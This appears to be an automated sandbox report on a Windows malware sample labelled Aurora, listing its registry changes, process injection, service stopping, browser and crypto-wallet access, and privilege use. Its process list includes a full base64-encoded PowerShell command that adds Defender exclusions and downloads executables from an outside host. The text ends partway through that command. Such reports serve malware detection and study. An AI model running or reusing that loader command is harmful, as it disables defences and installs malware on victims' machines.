Analysis Overview
SHA256
474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e
Threat Level: Known bad
The file 474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe was found to be: Known bad.
Malicious Activity Summary
Aurora
Suspicious use of NtCreateUserProcessOtherParentProcess
Modifies security service
Downloads MZ/PE file
Stops running service(s)
Blocklisted process makes network request
Drops file in Drivers directory
Executes dropped EXE
Uses the VBS compiler for execution
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Program Files directory
Launches sc.exe
Program crash
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-02-21 06:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-02-21 06:02
Reported
2023-02-21 06:08
Platform
win10v2004-20230220-en
Max time kernel
55s
Max time network
72s
Command Line
Signatures
Aurora
Modifies security service
| Description | Indicator | Process | Target |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | C:\Windows\System32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | C:\Windows\System32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1756 created 3180 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\Explorer.EXE |
| PID 1892 created 600 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\new2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\C4Loader.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SysApp.exe | N/A |
Reads user/profile data of web browsers
Uses the VBS compiler for execution
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1772 set thread context of 4328 | N/A | C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe |
| PID 1756 set thread context of 2476 | N/A | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | C:\Windows\System32\dialer.exe |
| PID 1892 set thread context of 2736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe | C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe
"C:\Users\Admin\AppData\Local\Temp\474301aa2294450d6e60ae07824076744bccc4b2603a03cee01de3b4dbada38e.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1772 -ip 1772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1772 -s 240
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAeAB5AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQB0AGMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgBlAGsAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGwAbQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgBoAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdAB2AGQAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBiAGMAagAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AYwBvAG4AbgBlAGMAdAAyAG0AZQAuAGgAbwBwAHQAbwAuAG8AcgBnAC8AdwBvAHcALwAxAC8AMgAvADMALwA0AC8ANQAvADYALwA3AC8AQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwAsACAAPAAjAHMAbQBpACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAeAB5AGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApACkAPAAjAHIAegB1ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACwAIAA8ACMAdAB1AGwAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAGwAbgAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwB0AGQAawAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBTAG0AYQByAHQARABlAGYAUgB1AG4ALgBlAHgAZQAnACkAKQA8ACMAcAB4AHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAeQBzAEEAcABwAC4AZQB4AGUAJwAsACAAPAAjAGQAawBjACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQBkAGQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdwB5AHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwB5AHMAQ